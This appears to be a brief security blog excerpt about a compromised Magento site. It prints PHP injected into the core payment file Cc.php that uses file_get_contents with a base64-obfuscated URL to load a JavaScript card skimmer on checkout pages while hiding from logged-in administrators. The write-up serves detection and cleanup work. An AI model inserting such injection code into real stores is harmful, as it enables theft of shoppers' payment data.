Published on 01/21/2021 – Last Updated on 01/21/2021 by OTC
A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php
…
if ($_SERVER[“REQUEST_METHOD”] === “GET”){
if (strpos($_SERVER[“REQUEST_URI”], “/onestepcheckout/index/”) !== false){
if(!isset($_COOKIE[“adminhtml”])){
echo file_get_contents(base64_decode(“aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM=”));
}
}
}
To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function file_get_contents and the URL obfuscated with base64.
Continue reading Magento PHP Injection Loads JavaScript Skimmer at Sucuri Blog.
Comments